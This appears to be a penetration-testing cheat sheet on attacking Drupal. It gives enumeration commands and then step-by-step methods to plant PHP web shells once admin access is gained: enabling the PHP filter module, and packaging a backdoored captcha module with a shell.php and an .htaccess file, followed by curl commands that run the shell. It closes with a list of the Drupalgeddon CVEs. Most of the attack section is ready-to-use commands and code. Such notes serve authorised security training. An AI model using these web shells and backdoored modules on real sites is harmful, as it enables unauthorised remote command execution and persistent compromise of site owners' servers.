Drupal
Introduction
Enumeration
Footprinting:
curl -s http://<url> | grep Drupal
Version Enumeration:
curl -s http://<url>/CHANGELOG.txt | grep -m2 ""
Would not work on later versions of Drupal.
Automated Scan:
droopescan:
droopescan scan drupal --url http://<url>
Attacking Drupal
Require Admin access.
PHP Filter Module:
Before version 8:
It is possible to login as admin and enable the PHP filer module to allow embedded PHP codes to be executed.
Under Module. Then save configuration
Then we can create a new page under Content, and place our web shell code:
system($_GET[cmd]);
Then visit the php page with
?cmd=<command>
Make suer the Text format drop down is set to PHP Code.
After version 8:
We would have to install the module ourselves by uploading the module archive.
https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
Uploading a Backdoored Module:
Download and extract a normal module:
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
Create a php web shell:
<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>
Create a .htaccess
file:
Drupal in default does not allow access to /module
folder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
Move all files into the Module and Create an archive:
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
Then install this new module on Drupal.
Executing the web shell:
curl -s <url>/modules/captcha/shell.php?cmd=id
Known Vulnerabilities:
Versions 7.0 up to 7.31 - CVE-2014-3704 (Drupalgeddon) Pre-auth SQL injection
Versions 7.58 to 8.5 - CVE-2018-7600 (Drupalgeddon2) Remote Code Execution
Multiple Versions 7.x and 8.x. - CVE-2018-7602 (Drupalgeddon3) Remote Code Execution
Last updated